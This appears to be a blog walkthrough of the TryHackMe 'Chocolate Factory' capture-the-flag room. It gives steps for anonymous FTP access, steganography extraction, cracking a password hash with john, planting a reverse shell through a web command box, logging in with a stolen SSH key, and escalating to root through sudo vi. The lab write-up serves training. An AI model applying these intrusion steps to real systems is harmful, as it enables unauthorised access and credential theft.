Open in app

Sign in

Write

Sign in

Mr.Salvat0re
3 min readJan 23, 2021

--

Chocolate Factory walk-through — TryHackMe

In this article I help you own the chocolate factory! chocolate factory room is a new released room on THM(TryHackMe) and it’s free! In this room we will do some steganography, enumeration and privilege escalation! It’s an easy rated room. Let’s jump in !

Enumeration

First deploy the machine and get the IP address.

Because we need that IP address a lot, so let’s make a variable to make it easy to use.

export ip=[machine-IP]

Test it with:

echo $ip

Then start nmap to scan the network side of the machine.

nmap -sV <ip-address> -oN nmap_scan

  • -sV : Gives the services/versions.
  • -oN : Saved the output into nmap_scan file in current directory(Normal format).

The output of scan:

As you see we have lots of open ports but most of them aren’t useful, let’s check ftp port for anonymous login.

and … yes we can login(username , password = anonymous)

run ls or dir, there is a file, get it with:

get <file-name>

I use steghide to extract the hidden file.

After some decryption, you see passwd file of machine!

Hopefully there is user credentials but the password is encrypted.so let’s bring john in.(not Hammond :))

john — format=sha512crypt file.hash — wordlist=/usr/share/wordlists/rockyou.txt

Then after one or two minutes john gives you the pass.

Let’s use creds to login ssh.

but it says the password is incorrect :/

Let’s move on…

Check the website of machine.Then we see that beautiful login page, put username and password inside it and boom! we are LOGGED IN.

There is a small input box there and an Execution button so let’s put a reverse shell.

KEY:

If you run strings command against all the files in /var/www/html you can find the key!

USER Flag:

After some searching you will find out that permissions of the user folder inside /home directory is not limited and you can go inside.

There is a teleport file(id_rsa). So login with that.

chmod 600 teleport; ssh -i teleport charlie@$ip

Now we are charlie. So without wasting time let’s submit user flag.

ROOT Flag:

As a hint, any time you login as a user run sudo -l ,If there is any allowed command that you can use it.

Charlie can run /usr/bin/vi command without any password.

Let’s check gtfobins for some magic!(shell section )

After migrating to /root directory you can’t find root.txt but you find root.py.

If you read that file ,you may understand the encryption type.(Fernet)

I use asecuritysite.com to decode it. just put the key and decoded string and submit root flag.

Thank YOU!

Believe it or not it was my first published walk-through and ofcourse it’s not the last. I hope you found it useful.

Keep hacking!

Salvat0re.

Tryhackme Walkthrough
Tryhackme

--

--

Mr.Salvat0re

Written by Mr.Salvat0re

1 Follower

Just a normal person who loves Python and hacking.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams